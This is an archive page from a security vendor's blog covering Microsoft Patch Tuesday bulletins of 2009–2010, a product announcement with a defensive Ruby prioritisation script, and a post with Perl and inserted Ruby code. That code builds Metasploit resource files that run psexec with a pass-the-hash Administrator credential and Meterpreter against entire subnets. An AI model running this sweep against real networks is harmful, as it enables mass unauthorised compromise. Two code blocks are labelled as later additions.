Time once again for this month’s summary of the latest Microsoft Security updates …

2 advisories, with 8 vulnerabilities covered. This is the lightest March update since Microsoft skipped March altogether back in 2007.

Here’s the breakdown:

MS10-016: Rated Important. Potential Remote Code Execution in Windows Movie Maker, covering 1 vulnerability: CVE-2010-0265 (Buffer Overflow in Movie Maker and Producer). A few things to note about this one …

First, Microsoft chose not to patch the exposure in Producer 2003. The stated reasons are the application’s limited distribution and the fact that automatic updates are not available for Producer. Given that Producer is used alongside PowerPoint, this looks like a cost benefit decision on Microsoft’s part: there may be additional code to check which isn’t justified by the limited install base. If there is no outcry from the community, this one will remain unpatched; if some noise is generated, expect more activity from Microsoft in response. Who knows … perhaps we’ll see some creativity from the threat community in malicious online PowerPoint presentations.

Second, user interaction is required for this one: a user has to open a specially crafted project file. Microsoft rates it as Exploit Index: 1; Deployment Priority: 2.

Third, this one is easy to overlook as few people will view Movie Maker as business critical technology. With the rapidly growing use of rich media online (punctuated by Cisco’s CRS-3 announcement today), this one could come back to bite people in the behind a year from now. If it happens, you heard it here first.

MS10-017: Rated Important. Potential Remote Code Execution in Excel, Excel Viewer, Office for Mac, Office Compatibility Pack, and Excel Services (part of the default SharePoint Server 2007 configuration), covering 7 vulnerabilities: CVE-2010-0257 (Record Memory Corruption), CVE-2010-0258 (Sheet Object Type Confusion), CVE-2010-0260 (MDXTUPLE Record Heap Overflow), CVE-2010-0261 (MDXSET Record Heap Overflow), CVE-2010-0262 (FNGROUPNAME Record Uninitialized Memory), CVE-2010-0263 (XLSX File Parsing), and CVE-2010-0264 (DbOrParamQry Record Parsing). This one replaces MS09-067 from November of last year, along with MS09-021 from June of last year on SharePoint. Microsoft rates it as Exploit Index: 1; Deployment Priority: 2.

Clearly the highest priority this month: test the update and roll it out in relatively short order. Excel is everywhere in the enterprise, and don’t overlook Excel Services running on SharePoint Server 2007, where the affected parsing code runs on the server rather than on a user’s desktop.

MS09-033 (the Virtual PC and Virtual Server Elevation of Privilege update from July of last year) was re-released today, as Virtual Server 2005 was added to the affected products list. If you’re running Virtual Server 2005, be sure to pull this one into your remediation activities as well – after Excel and before Movie Maker.

After last month’s monster update, this is a light one. Advice is to patch Excel first and, if you’re running Movie Maker, schedule that update in short order. If you’re running Producer, Microsoft’s workaround is to remove the file type association, so a malicious project file would have to be opened manually from within the application rather than launching it from a careless double-click.

As with every month, NeXpose Community Edition, the free version of NeXpose, will have coverage within 24 hours of the release. NeXpose Community Edition will allow you to detect these and every other Microsoft vulnerability and, if you wish, launch Metasploit Security Testing to confirm the presence and exploitability of the exposure(s) with publicly available exploits on up to 32 hosts in your environment. For small environments with 32 nodes or less, you can use NeXpose to provide free detection within 24 hours of Microsoft’s update release.

For larger environments, even if NeXpose is not your current Enterprise Vulnerability Management solution, we invite you to download Community Edition and run it alongside your tool on Wednesday to audit the effectiveness of your solution on up to 32 hosts.

NeXpose Community Edition is available for immediate download at no cost here: http://www.rapid7.com/nexposecommunitydownload.jsp

We also invite you to visit the Community Portal at http://community.rapid7.com to share information with other Security Professionals following the Microsoft release.

As always, Happy patching!!

  • February 23rd, 2010

Introducing Exploit Exposure

We just released a new version of NeXpose to all of our users that has a new technology we call Exploit Exposure ™. Exploit Exposure shows you, for each vulnerability NeXpose reports, whether a working exploit is known for it. Why is this important? The Rapid7 vulnerability database contains checks for over 12,000 vulnerabilities, and most organizations have more vulnerabilities than they have time to correct, so they need to be prioritized. Now, with Exploit Exposure, you will know which vulnerabilities have real exploits (thanks to our links to both Metasploit and Exploit Database) and you can fix those vulnerabilities first.

In addition, NeXpose uses the exploit ranking data from the Metasploit team to classify the skill level required for a given exploit. Since you can’t predict the skill level of an attacker, we strongly recommend that you immediately remediate any vulnerability that has a live exploit, regardless of the skill level required for an exploit or the number of exploits available for a given vulnerability. At the same time, we wanted to give you the full information so you can make an informed decision.

With Exploit Exposure, NeXpose tells you what you need to remediate right now without buying another product or searching the web for each vulnerability. This tells you your real-world risk and what you need to remediate. Unlike patch-centric prioritization schemes, which can lull administrators into a false sense of security, this vulnerability-centric approach covers all known exploit paths into your system. For example, a 0-day vulnerability is flagged immediately (given the presence of an exploit) even if a patch is not yet available. We give you possible remediation actions for 0-days (e.g., add a firewall rule) so that your organization is protected.
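The prioritization logic described above, written out as an added example in Ruby (Metasploit’s own language). This is not Rapid7 or NeXpose code: the exploit index, the scan findings and the host names are constructed sample data, and the numeric rank values are Metasploit’s module ranking scale (manual 0 through excellent 600). The example sorts findings into three tiers (exploit but no patch, exploit with patch, no known exploit) and within a tier by the best available exploit rank, which is the ordering the text argues for.

```ruby
# Added example (not Rapid7 code): rank scan findings by exploit availability.
# Metasploit module rankings, highest first; a higher rank means the exploit
# is more reliable and needs less attacker skill.
METASPLOIT_RANKS = {
  'excellent' => 600, 'great' => 500, 'good' => 400, 'normal' => 300,
  'average' => 200, 'low' => 100, 'manual' => 0
}.freeze

Finding = Struct.new(:host, :cve, :patch_available, keyword_init: true)
Exploit = Struct.new(:cve, :source, :rank, keyword_init: true)

# Exploit index a scanner would carry. Constructed for this example; the
# ranks are illustrative, not the real rankings of any Metasploit module.
EXPLOIT_INDEX = [
  Exploit.new(cve: 'CVE-2010-0232', source: 'metasploit', rank: 'great'),
  Exploit.new(cve: 'CVE-2010-0232', source: 'exploit-db', rank: 'manual'),
  Exploit.new(cve: 'CVE-2010-0249', source: 'metasploit', rank: 'good'),
  Exploit.new(cve: 'CVE-2010-0249', source: 'exploit-db', rank: 'manual')
].freeze

def exploits_for(cve, index = EXPLOIT_INDEX)
  index.select { |e| e.cve == cve }
end

# Sort key per finding; lower sorts first.
#   tier 0: exploit exists and no patch (0-day): compensating control now
#   tier 1: exploit exists, patch available:     patch now
#   tier 2: no known exploit:                    schedule
# Within a tier, the best exploit rank and then the exploit count decide.
def priority_key(finding, index = EXPLOIT_INDEX)
  exploits = exploits_for(finding.cve, index)
  tier = if exploits.empty? then 2
         elsif finding.patch_available then 1
         else 0
         end
  best_rank = exploits.map { |e| METASPLOIT_RANKS.fetch(e.rank, 0) }.max || -1
  [tier, -best_rank, -exploits.size, finding.cve, finding.host]
end

def prioritize(findings, index = EXPLOIT_INDEX)
  findings.sort_by { |f| priority_key(f, index) }
end

# Suggested action per tier; a 0-day gets a workaround, not a patch.
def action_for(finding, index = EXPLOIT_INDEX)
  case priority_key(finding, index).first
  when 0 then 'no patch; apply workaround (e.g., firewall rule, disable feature)'
  when 1 then 'patch now; public exploit available'
  else        'schedule in normal patch cycle'
  end
end

# Constructed scan results for a few hosts.
FINDINGS = [
  Finding.new(host: 'ws-01',  cve: 'CVE-2010-0018', patch_available: true),
  Finding.new(host: 'ws-01',  cve: 'CVE-2010-0232', patch_available: true),
  Finding.new(host: 'ws-02',  cve: 'CVE-2010-0249', patch_available: false),
  Finding.new(host: 'srv-01', cve: 'CVE-2010-0035', patch_available: true)
].freeze

if __FILE__ == $PROGRAM_NAME
  prioritize(FINDINGS).each do |f|
    puts format('%-7s %-14s %s', f.host, f.cve, action_for(f))
  end
end
```

The tier comes first in the key on purpose: a single manual-rank exploit against an unpatched service still outranks a vulnerability with no public exploit at all, which matches the advice to remediate anything with a live exploit regardless of the skill it requires.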

This is just the tip of the iceberg in terms of what we want to accomplish by sharing data between NeXpose and Metasploit, so stay tuned for more. I’m also interested in hearing your feedback, so please post to the nexpose-users mailing list or a comment in the blog below. If you want to see Exploit Exposure firsthand, download the free NeXpose Community Edition.

  • February 09th, 2010

February Microsoft Patch Tuesday Roundup

Time for this month’s summary of the latest Microsoft Security updates …

13 advisories, with 26 vulnerabilities covered. This is the busiest February update ever.

Here’s the breakdown:

MS10-003: Rated Important. Potential Remote Code Execution in Office XP and Office 2004 for Mac, covering 1 vulnerability: CVE-2010-0243 (Buffer Overflow in MSO.DLL). This one replaces the MS09-062 GDI+ patch from last October. Important to note that user interaction is required for this one. Microsoft rates it as Exploit Index: 1; Deployment Priority: 2.

MS10-004: Rated Important. Potential Remote Code Execution in PowerPoint 2002, 2003, and Office 2004 for Mac, covering 6 vulnerabilities: CVE-2010-0029 (File Path Handling Buffer Overflow), CVE-2010-0030 (Heap Overflow), CVE-2010-0031 (Invalid Array Indexing), CVE-2010-0032 (Use After Free), CVE-2010-0033 (Viewer TextBytesAtom Record Stack Overflow), and CVE-2010-0034 (Viewer TextCharsAtom Record Stack Overflow). This one replaces MS09-017 from May of last year. Microsoft rates it as Exploit Index: 1; Deployment Priority: 2.

MS10-005: Rated Moderate. Potential Remote Code Execution in Microsoft Paint, covering 1 vulnerability: CVE-2010-0028 (JPEG image decoding). This is my favourite vulnerability this month … jpg decoding in paint?? Awesome. Microsoft rates it as Exploit Index: 2; Deployment Priority 3. I love that this is not the lowest priority update this month … 2 others have a lower Exploit Index.

MS10-006: Rated Critical. Potential Remote Code Execution in all supported Windows versions, covering 2 vulnerabilities: CVE-2010-0016 (SMB Client Pool Corruption), and CVE-2010-0017 (SMB Client Race Condition). The attack is unauthenticated, but the victim client must be induced to initiate an SMB connection to an attacker-controlled server. Microsoft rates it as Exploit Index: 1; and it is one of five with a Deployment Priority of 1.

MS10-007: Rated Critical. Potential Remote Code Execution in Windows Shell Handler, affecting Windows 2000, XP, and Server 2003, covering 1 vulnerability: CVE-2010-0027 (URL Validation). Microsoft rates it as Exploit Index: 1; Deployment Priority 1.

MS10-008: Rated Critical. Cumulative ActiveX Kill Bits Update, “covering” 1 vulnerability: CVE-2010-0252 (Data Analyzer ActiveX Control). This one replaces the ActiveX Cumulative update MS09-055 from November of last year. Microsoft rates it as Deployment Priority: 1; Exploit Index is not applicable because … hey, it’s a cumulative update for ActiveX Kill Bits.

MS10-009: Rated Critical. Potential Remote Code Execution in Windows TCP/IP, covering 4 vulnerabilities: CVE-2010-0239 (ICMPv6 Router Advertisement), CVE-2010-0240 (Header MDL Fragmentation), CVE-2010-0241 (ICMPv6 Route Information), and CVE-2010-0242 (TCP/IP Selective Acknowledgement). This one affects Vista and Server 2008. Microsoft rates it as Exploit Index: 2; Deployment Priority 2, stating that the Remote Code Execution is not likely to see PoC in the near term. We’ll be watching this one to see if they are correct.

MS10-010: Rated Important. Potential Denial of Service in Hyper-V on Server 2008 and Server 2008 R2, covering 1 vulnerability: CVE-2010-0026 (Instruction Set Validation). As predicted, this one is pushed to the bottom of Microsoft’s severity list with Exploit Index: 3; Deployment Priority: 3. We’ll be watching to see if attackers start crashing Hyper-V hosts from inside guests on 2008 and/or 2008 R2 machines. If so, expect the Security versus Availability debate to rear its ugly head (again).

MS10-011: Rated Important. Potential Elevation of Privilege in Windows Client/Server Runtime Subsystem on Windows 2000, XP, and Server 2003, covering 1 vulnerability: CVE-2010-0023 (CSRSS Local Privilege Elevation). The root of the issue is that user processes are not properly terminated on logout. Microsoft rates it as Exploit Index: 1; Deployment Priority 2.

MS10-012: Rated Important. Potential Remote Code Execution in SMB Server affecting all supported versions of Windows, covering 4 vulnerabilities: CVE-2010-0020 (Pathname Overflow), CVE-2010-0021 (Memory Corruption), CVE-2010-0022 (Null Pointer), and CVE-2010-0231 (NTLM Authentication Lack of Entropy). This is this month’s SMB Server side issue. Microsoft rates it as Exploit Index: 1; Deployment Priority 2.

MS10-013: Rated Critical. Potential Remote Code Execution in DirectShow, covering 1 vulnerability: CVE-2010-0250 (Heap Overflow). Everyone will be talking about this one because people love DirectShow exposures. Be careful when viewing videos via Bing, I suppose … user interaction is required and you don’t want to be that guy/girl. Affecting all versions of Windows, Microsoft rates it as Exploit Index: 1; Deployment Priority: 1.

MS10-014: Rated Important. Potential Denial of Service in Kerberos affecting Windows 2000 Server, Server 2003, and Server 2008, covering 1 vulnerability: CVE-2010-0035 (Null Pointer Dereference). This one actually looks quite interesting, with clients on remote, non-Windows realms in a mixed-mode implementation able to cause Domain Controllers to stop responding. As with almost every DoS Microsoft has ever patched, this one is at the bottom of the severity list with the Hyper-V issue. Microsoft rates it as Exploit Index 3; Deployment Priority: 3.

MS10-015: Rated Important. Potential Elevation of Privilege in the Windows Kernel affecting every supported Windows version, covering 2 vulnerabilities: CVE-2010-0232 (Exception Handler), and CVE-2010-0233 (Double Free). The Exception Handler issue is the good old 16 bit support problem in NTVDM that’s apparently been shipping for about 17 years, so it only applies to 32 bit editions; discovered by Tavis Ormandy from Google. Disabling NTVDM (Microsoft’s workaround sets the VDMDisallowed registry value under HKLM\SOFTWARE\Policies\Microsoft\Windows\AppCompat, or the equivalent Group Policy setting) works around the Exception Handler issue; there is no workaround for the Double Free issue. Microsoft rates it as Exploit Index 1 and Deployment Priority 1, both because exploit code is already public. This is the only one this month that has public exploit code cited by Microsoft in their summary.

With most enterprises coming out of their year end production change freeze, Microsoft is putting out a mountain of updates this month. Similar to last October’s monster update, this is going to be a busy one for everyone, with every version of Windows affected. 32 bit server platforms and older workstation versions are hit hardest, with Windows 2000, XP, Server 2003, and Server 2008 seeing 9, 8, 9, and 8 updates respectively (5, 5, 4, and 3 Critical). Having said that, there is no Windows version with fewer than 5 updates this month.

Fortunately, the list of affected products is much smaller than October’s update, so it should be easier to test and roll out patches for these 26 vulnerabilities. In many larger enterprises there are still unpatched vulnerabilities from October. Since the risk of an unpatched vulnerability only grows with time, it is important to get this month’s updates distributed so companies can continue working through lingering issues from last year and prepare for the IE and SMB issues that were not addressed by Microsoft this month.

NeXpose Community Edition, the free version of NeXpose, will have coverage within 24 hours of the release. NeXpose Community Edition will allow you to detect these vulnerabilities and, if you wish, launch Metasploit Security Testing to confirm the presence and exploitability of the exposure(s) with publicly available exploits on up to 32 hosts in your environment. For small environments with 32 nodes or less, you can use NeXpose to provide free detection within 24 hours of Microsoft’s update release.

For larger environments, even if NeXpose is not your current Enterprise Vulnerability Management solution, we invite you to download Community Edition and run it alongside your tool on Wednesday to audit the effectiveness of your solution on up to 32 hosts.

NeXpose Community Edition is available for immediate download at no cost here: http://www.rapid7.com/nexposecommunitydownload.jsp

We also invite you to visit the Community Portal at http://community.rapid7.com to share information with other Security Professionals about the Microsoft release.

As always, Happy patching!!

  • February 04th, 2010

February Microsoft Patch Tuesday Preview

Sheldon here with a quick preview of next week’s Microsoft Patch Tuesday updates …

If you’re on the customer side, you have a lot of patching to do starting next week. If you’re on the Security Research side, order some extra pizza and chill an extra case of Red Bull … this is going to be a busy one.

13 bulletins coming out on Tuesday – the most ever in February by my count. Last year was lighter than usual … we usually see 11 or 12 in February. December and January are usually light, so February is a busy clean-up month for Microsoft Security Updates. Had last month’s out-of-band IE update waited for February it would have been 14; as it stands, 13 is a February record and ties last October for the most updates in a single Patch Tuesday.

2 Denial of Service; 2 Elevation of Privilege; and 9 Remote Code Execution.

2 updates for Office; 11 for Windows, with 26 (yes, 26) total vulnerabilities addressed.

Here’s a breakdown by affected software:

WINDOWS:

- Windows 2000: 9 updates … 5 Critical; 3 Important; and 1 Moderate

- Windows XP: 8 updates … 5 Critical; 2 Important; and 1 Moderate

- Server 2003: 9 updates … 4 Critical; 3 Important; 2 Moderate

- Vista: 6 updates … 3 Critical; and 3 Important

- Server 2008: 8 updates … 3 Critical; 4 Important; and 1 Low

- Windows 7: 5 updates … 3 Critical; and 2 Important

- Server 2008 R2: 5 updates … 3 Critical; 1 Important; and 1 Low

OFFICE:

- Office XP: 2 updates … 2 Important

- Office 2003: 1 update … 1 Important

- Office 2004 for Mac: 2 updates … 2 Important

Interesting to note, there are 2 known issues that will not be addressed on Tuesday.

The first one is the IE “Information Disclosure” vulnerability that some have described as “turning your PC into an Internet File Server”. Catchy … wish I’d thought of that description. No word yet if this will result in an out-of-band update or if it will wait until March or later. (Metasploit might have more influence on that decision than internal Microsoft processes — too early to say at this point). That’s advisory 980088.

The second one is the SMB DoS vulnerability that Microsoft discussed in advisory 977544 back in November. They are still working through that update, and as we’ve noted several times in the past, Microsoft is not known for rushing DoS fixes.

Microsoft *is* patching an issue that is 17 years in the making, however. This one only affects 32 bit Windows versions, and the exposure lies in the NT Virtual DOS Machine (NTVDM) subsystem that’s been around since the early Windows NT days. For those who aren’t aware, NTVDM is what allows 32 bit Windows versions to run 16 bit Windows applications and MS-DOS programs. If you’re not running 16 bit apps, disabling it should have no impact on you. If you are still running 16 bit apps, I hope they’re not mission critical.

We’ll have more information for you when the advisories come out on Tuesday. Until then, get some rest … if you’re reading this, you’ll likely need it.


Yesterday proved to be another busy day for the security community with Microsoft’s out of band security update for Internet Explorer. We’ve already blogged about the positive impact that Metasploit and the broader security community are having on increasing the awareness for major security issues.

Within 24 hours of the security update, we’ve included coverage for these vulnerabilities across all of our product lines, including NeXpose Community Edition. What’s interesting here is with the Community Edition, Rapid7 is the only vendor that provides a free solution for commercial use that has up-to-date vulnerability coverage within 24 hours. Something to think about for all those organizations that use commercial and open source offerings that have delayed vulnerability updates…

  • January 21st, 2010

January Out of Band Microsoft Patch Tuesday Roundup

After a quiet Patch Tuesday last week with only one vulnerability announced, that calm has been followed by a bit of a storm. Here is a quick summary of Microsoft’s out-of-band security update …

1 update, with 8 vulnerabilities covered. Here’s the breakdown:

MS10-002: Rated Critical. Potential Remote Code Execution in Internet Explorer, covering 8 vulnerabilities: CVE-2009-4074 (XSS Filter Script Handling), CVE-2010-0027 (URL Validation), CVE-2010-0244 (Uninitialized Memory Corruption), CVE-2010-0245 (Uninitialized Memory Corruption), CVE-2010-0246 (Uninitialized Memory Corruption), CVE-2010-0247 (Uninitialized Memory Corruption), CVE-2010-0248 (HTML Object Memory Corruption), and CVE-2010-0249 (HTML Object Memory Corruption). This update replaces MS09-072 from December of last year, which was Critical everywhere except for IE 7 and 8 on Server 2003 and for all IE versions on Server 2008 and Server 2008 R2, where it was rated Moderate.

As with MS09-072, this one needs a little more explanation to lay out what severity ratings map to what:

BY IE VERSION
- IE 5.01 & 6 are rated Critical on Windows 2000
- IE 6, 7, & 8 are rated Critical on XP
- IE 6 is rated *MODERATE*, IE 7 & 8 are rated *CRITICAL* on Server 2003
- MS09-072 was reversed: Critical on IE 6; Moderate on IE 7 & 8 for Server 2003
- IE 7 & 8 are rated Critical on Vista
- IE 7 & 8 are rated *CRITICAL* on Server 2008
- MS09-072 was rated Moderate for Server 2008
- IE 8 is rated *CRITICAL* on Server 2008 R2
- MS09-072 was rated Moderate for Server 2008 R2
- IE 8 is rated Critical on Windows 7

BY VULNERABILITY
- CVE-2009-4074:
- Moderate (Information Disclosure) for IE 8 on XP, Vista, and Windows 7
- Low (Information Disclosure) for IE 8 on Server 2003, Server 2008, and Server 2008 R2

- CVE-2010-0027:
- Critical (Remote Code Execution) for IE 7 on XP, Server 2003, Vista, Server 2008, and Windows 7
- Critical (Remote Code Execution) for IE 8 on XP, Server 2003, Vista, Server 2008, Windows 7, and Server 2008 R2

- CVE-2010-0244:
- Critical (Remote Code Execution) for IE 6 on Windows 2000 and XP
- Moderate (Remote Code Execution) for IE 6 on Server 2003
- Critical (Remote Code Execution) for IE 7 on XP and Vista
- Moderate (Remote Code Execution) for IE 7 on Server 2003, Server 2008
- Critical (Remote Code Execution) for IE 8 on XP, Vista, and Windows 7
- Moderate (Remote Code Execution) for IE 8 on Server 2003, Server 2008, and Server 2008 R2

- CVE-2010-0245:
- Critical (Remote Code Execution) for IE 8 on XP and Vista
- Moderate (Remote Code Execution) for IE 8 on Server 2003 and Server 2008
- Low (Denial of Service) for IE 8 on Windows 7 and Server 2008 R2

- CVE-2010-0246:
- Critical (Remote Code Execution) for IE 8 on XP, Vista, and Windows 7
- Moderate (Remote Code Execution) for IE 8 on Server 2003, Server 2008, and Server 2008 R2

- CVE-2010-0247:
- Critical (Remote Code Execution) for IE 5.01 on Windows 2000
- Critical (Remote Code Execution) for IE 6 on Windows 2000 and XP
- Moderate (Remote Code Execution) for IE 6 on Server 2003

- CVE-2010-0248:
- Critical (Remote Code Execution) for IE 6 on Windows 2000, XP, Vista, and Windows 7
- Moderate (Remote Code Execution) for IE 6 on Server 2003
- Critical (Remote Code Execution) for IE 7 on XP and Vista
- Moderate (Remote Code Execution) for IE 7 on Server 2003 and Server 2008
- Critical (Remote Code Execution) for IE 8 on XP, Vista, and Windows 7
- Moderate (Remote Code Execution) for IE 8 on Server 2003, Server 2008, and Server 2008 R2

- CVE-2010-0249:
- Critical (Remote Code Execution) for IE 6 on Windows 2000 and XP
- Moderate (Remote Code Execution) for IE 6 on Server 2003
- Critical (Remote Code Execution) for IE 7 on XP and Vista
- Moderate (Remote Code Execution) for IE 7 on Server 2003 and Server 2008
- Critical (Remote Code Execution) for IE 8 on XP, Vista, and Windows 7
- Moderate (Remote Code Execution) for IE 8 on Server 2003, Server 2008, and Server 2008 R2

Hopefully this makes things a little clearer.

There has been a lot of buzz about this one, and we’d like to take a moment to thank the research community (and our own Metasploit team) for raising the profile of this issue and helping to raise the priority for Microsoft’s update(s). As expected, there are some who would paint the efforts of community researchers and the Metasploit project as “enabling the bad guys”. This could not be further from the truth … underestimating the severity of an existing risk does nothing to protect systems from compromise. Customers are getting the IE fix nearly 3 weeks earlier due in part to the availability of public exploit code and supporting research. Despite the fact that Microsoft has known about the issue since August, we believe they should be applauded for their responsiveness following the release of public exploit code. We feel very strongly that this is an example of community research prompting vendor actions that are ultimately in the best interest of customers.

NeXpose Community Edition, the free version of NeXpose, will have coverage within 24 hours of the release. NeXpose Community Edition will allow you to detect these vulnerabilities and, if you wish, launch Metasploit Security Testing to confirm the presence and exploitability of the exposure(s) on up to 32 hosts in your environment. For small environments with 32 nodes or less, you can use NeXpose to provide free detection within 24 hours of Microsoft’s update release.

For larger environments, even if NeXpose is not your current Enterprise Vulnerability Management solution, we invite you to download Community Edition and run it alongside your tool on Wednesday to audit the effectiveness of your solution on up to 32 hosts.

NeXpose Community Edition is available for immediate download at no cost here: http://www.rapid7.com/nexposecommunitydownload.jsp

We also invite you to visit the Community Portal at http://community.rapid7.com to share information with other Security Professionals following the Microsoft release.

As always, Happy patching!!

  • January 19th, 2010

The Story Behind NeXpose Community Edition

Hi, I’m the product manager here at Rapid7 and one of the many people behind the Community Edition. I joined Rapid7 in July after spending my last eight years with Red Hat. Before that, I worked at another open source software company. Naturally, I have strong opinions on why open source and community-driven software is a fundamentally better way to build and release software.

With that as a background, I thought I’d take some time and explain the motivation and philosophy behind NeXpose Community Edition and why we decided to do it. At Rapid7, we’ve always been big believers in open disclosure as the best way to improve security. The community-driven security process works. In the software industry, the momentum is clearly towards openness and community. Some software companies are doing it just for the marketing (and it shows), but many others are actively embracing community and openness as part of their DNA. It’s not necessarily an easy or free process, but at the end of it there are incredible benefits – starting with better software and happier customers.

As a group, we looked at the security market and at vulnerability management in particular, and we didn’t see a transition from closed to open. Surprisingly, we saw the opposite – a trend from open to closed. We think that this is bad for security, bad for customers, and bad for the community. And so it became apparent that releasing a free, unrestricted version of NeXpose would be a good thing.

But before we did that, I wanted to have a conversation internally about why we were doing it. I wanted to make sure that Rapid7 as a company was committed to investing in the community, instead of just releasing a free version of NeXpose and then hoping a community would materialize, because communities don’t just appear for free. So we had some active, spirited conversations about this and we decided, as a company, that we are committed to building a community.

We then had the debate about what features to include in Community Edition. After all, we are a for-profit company and we do have a duty to our shareholders to make money. Simultaneously, we wanted something that would be generically useful for everyone, and not just for a few. So we decided that, while we would impose some limitations (mostly around the number of IPs and some enterprise features), we would release with a license that does not restrict use, as well as real-time vulnerability updates (including our 24 hour Microsoft Patch Tuesday updates).

So, after that decision, in the last quarter of 2009, Rapid7 dramatically expanded the number of full-time engineers working on the free, open source version of Metasploit. We launched NeXpose Community Edition with flexible license terms and real-time vulnerability updates. We released Metasploit + NeXpose integration. We launched community.rapid7.com. We’ve responded to some of the initial feedback from the community, with more reporting functionality and improved usability. We’ve just barely started and we won’t stop. Stay tuned for more.

  • January 12th, 2010

January Microsoft Patch Tuesday Roundup

A new year, a new decade, and time once again for this month’s summary of the latest Microsoft Security updates … actually, that’s *update*.

1 update, with 1 vulnerability covered. Here’s the breakdown:

MS10-001: Rated Critical. Potential Remote Code Execution via integer overflow in LZCOMP Decompressor of the Embedded OpenType (EOT) Font Engine, covering 1 vulnerability: CVE-2010-0018. Important to note that Windows 2000 is rated critical; all others are rated low. This update replaces MS09-029 from July of last year, which was critical across the board.

Also interesting to note: Microsoft has specifically called out that the SMB DoS exposure is not being addressed today as they are still conducting research. No indication if this will be released as a subsequent out-of-band issue or whether we’ll see it in a future Patch Tuesday, although Microsoft does not have a history of addressing DoS exposures out of band.

NeXpose Community Edition, the free version of NeXpose, will have coverage within 24 hours of the release. NeXpose Community Edition will allow you to detect this vulnerability and, if you wish, launch Metasploit Security Testing to confirm the presence and exploitability of the exposure(s) on up to 32 hosts in your environment. For small environments with 32 nodes or less, you can use NeXpose to provide free detection within 24 hours of Microsoft’s update release.

For larger environments, even if NeXpose is not your current Enterprise Vulnerability Management solution, we invite you to download Community Edition and run it alongside your tool on Wednesday to audit the effectiveness of your solution on up to 32 hosts.

NeXpose Community Edition is available for immediate download at no cost here: http://www.rapid7.com/nexposecommunitydownload.jsp

We also invite you to visit the Community Portal at http://community.rapid7.com to share information with other Security Professionals following the Microsoft release.

As always, Happy patching!!

  • December 18th, 2009

Metasploit PSEXEC scanner (via Perl)

Metasploit’s psexec module is one of my favorite modules. It does exactly what I need and it does it really well. One thing I wish Metasploit had is a scanner version of the psexec exploit module, so I decided to build my own with Perl.

Okay, assume we have the following networks: 192.168.1.0/24, 192.168.2.0/24 etc etc… We know the local admin account is Administrator and the hash for the account is ADMINISTRATOR:HASH.

First, we build a small Perl script to generate a configuration file:


#!/usr/bin/perl -w
use strict;

# Networks to sweep (first three octets) and the local Administrator
# credential. SMBPass takes a pass-the-hash credential as LMHASH:NTHASH.
my @ranges = ('192.168.1', '192.168.2');
my $user   = 'Administrator';
my $hash   = 'ADMINISTRATOR:HASH';

print "use windows/smb/psexec\n";
print "set SMBUser $user\n";
print "set SMBPass $hash\n";
print "set PAYLOAD windows/meterpreter/bind_tcp\n";

foreach my $net (@ranges) {
    foreach my $host (1 .. 254) {
        print "set RHOST $net.$host\n";
        # -j runs the attempt as a background job and -z keeps msfconsole from
        # dropping into the new session, so the script moves on to the next host
        # instead of stalling on the first shell.
        print "exploit -j -z\n";
        print "sleep 2\n";
    }
}

Once we have this script built, we simply execute it and save the result to a file named psexec.rc.

perl psexec-192-168.pl > psexec.rc

Lastly, we leverage Metasploit’s ability to execute console commands from a resource file. Once msfconsole loads psexec.rc, it will execute all of the commands we generated using the Perl script. This basically gives us a nice way to turn an exploit module into a scanner.

msfconsole -r psexec.rc

Loading psexec.rc will exploit all of the systems within the networks specified and the result will be tons and tons of shells.
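The same generator, as an added example in Ruby (Metasploit’s own language) rather than code from the original post. It goes a little beyond the Perl above: it takes proper CIDR blocks instead of hard-coded third octets, drops network and broadcast addresses, and refuses a credential that is not in the LMHASH:NTHASH form the psexec module expects for pass-the-hash. The networks, user and hash are placeholders (the hash shown is the well-known empty-password LM:NT pair, used only so the format check passes).

```ruby
require 'ipaddr'

# Added example, not from the original post: build an msfconsole resource
# file that runs windows/smb/psexec against every host in some CIDR blocks.

# psexec's SMBPass accepts a pass-the-hash credential as LMHASH:NTHASH,
# 32 hex characters each.
HASH_RE = /\A[0-9a-f]{32}:[0-9a-f]{32}\z/i

# Expand a CIDR block into usable host addresses. Network and broadcast
# addresses are dropped for anything larger than a /31.
def hosts_in(cidr)
  addrs = IPAddr.new(cidr).to_range.to_a
  addrs = addrs[1..-2] if addrs.size > 2
  addrs.map(&:to_s)
end

# Return the resource-file lines. 'exploit -j -z' runs each attempt as a
# background job without dropping into the new session, so the sweep does
# not stall on the first shell.
def rc_lines(cidrs, user, hash, payload: 'windows/meterpreter/bind_tcp', pause: 2)
  raise ArgumentError, 'SMBPass must be LMHASH:NTHASH' unless HASH_RE.match?(hash)

  lines = ['use windows/smb/psexec',
           "set SMBUser #{user}",
           "set SMBPass #{hash}",
           "set PAYLOAD #{payload}"]
  cidrs.flat_map { |c| hosts_in(c) }.uniq.each do |ip|
    lines << "set RHOST #{ip}" << 'exploit -j -z' << "sleep #{pause}"
  end
  lines
end

if __FILE__ == $PROGRAM_NAME
  # Placeholder credential: the empty-password LM:NT pair. Replace it with
  # the hash you actually recovered.
  hash = 'aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0'
  puts rc_lines(%w[192.168.1.0/24 192.168.2.0/24], 'Administrator', hash)
end
```

Run it as `ruby psexec-rc.rb > psexec.rc` and load the result with `msfconsole -r psexec.rc`, exactly as with the Perl version. Because the hosts are expanded eagerly, keep the blocks to IPv4 ranges of reasonable size; a /8 would produce sixteen million lines.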

Regards,
Jabra

  • December 08th, 2009

December Microsoft Patch Tuesday Roundup

Time once again for this month’s summary of the latest Microsoft Security updates. NeXpose (including the free NeXpose Community Edition) users will have coverage within 24 hours or less. Metasploit already had a module for the IE exposure.

6 updates, with 12 vulnerabilities covered. Here’s the breakdown:

MS09-069: Rated Important. Potential Denial of Service in LSASS via ISAKMP over IPsec, covering 1 vulnerability: CVE-2009-3675. Important to note that Windows 2000, XP, and Server 2003 are affected; newer versions of Windows are not.

MS09-070: Rated Important. Potential Remote Code Execution and Elevation of Privilege in Active Directory Federation Services, covering 2 vulnerabilities: CVE-2009-2508 (Moderate; Spoofing) and CVE-2009-2509 (Important; Remote Code Execution). Important to note that the Spoofing exposure requires the attacker to obtain a valid authentication token. While this is a practical exposure on Internet kiosks, etc., most enterprises should have this covered under common best practices. The Remote Code Execution exposure has a significant impact on ADFS-enabled Web servers; however, the attacker must have valid credentials to exploit this vulnerability.

